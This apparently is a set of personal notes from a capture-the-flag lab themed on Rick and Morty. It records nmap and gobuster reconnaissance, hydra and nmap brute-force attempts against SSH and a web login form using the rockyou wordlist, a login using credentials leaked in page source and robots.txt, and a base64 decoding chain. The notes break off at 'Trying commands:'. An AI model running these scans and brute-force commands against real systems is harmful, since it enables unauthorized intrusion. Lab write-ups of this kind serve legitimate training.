Source:
<!--
Note to self, remember username!
Username: R1ckRul3s
-->
$ nmap -A 10.10.134.61
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 f8:89:83:22:6c:ab:84:05:23:b0:f6:d2:c0:42:e3:a6 (RSA)
| 256 cc:a0:09:40:f9:7c:3d:9c:ef:33:d1:19:26:88:45:5b (ECDSA)
|_ 256 f6:a1:ce:33:f5:74:3f:f0:a2:f5:6c:ec:0e:b0:73:f3 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Rick is sup4r cool
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
$ gobuster dir -u 10.10.134.61 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
/assets (Status: 301) # nothing
/robots.txt (Status: 200) # "Wubbalubbadubdub"
$ hydra -l R1ckRul3s -P /usr/share/wordlists/rockyou.txt ssh://10.10.134.61
[ERROR] target ssh://10.10.134.61:22/ does not support password authentication (method reply 4).
$ nmap 10.10.134.61 --script ssh-brute --script-args userdb=user,passdb=/usr/share/wordlists/rockyou.txt
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
|_ssh-brute: Password authentication not allowed
Try /login.php, success!
$ hydra -l R1ckRul3s -P /usr/share/wordlists/rockyou.txt 10.10.134.61 http-post-form "/login.php:username=^USER^&password=^PASS^&sub=Login:Invalid username or password." -V
# nothing
Try "Wubbalubbadubdub" from robots.txt → success!
To "Command Panel". All other tabs → /denied.php "Only the REAL rick can view this page.."
View source:
<!-- Vm1wR1UxTnRWa2RUV0d4VFlrZFNjRlV3V2t0alJsWnlWbXQwVkUxV1duaFZNakExVkcxS1NHVkliRmhoTVhCb1ZsWmFWMVpWTVVWaGVqQT0== -->
kali$ echo -n Vm1wR1UxTnRWa2RUV0d4VFlrZFNjRlV3V2t0alJsWnlWbXQwVkUxV1duaFZNakExVkcxS1NHVkliRmhoTVhCb1ZsWmFWMVpWTVVWaGVqQT0== | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d
rabbit hole
Trying commands: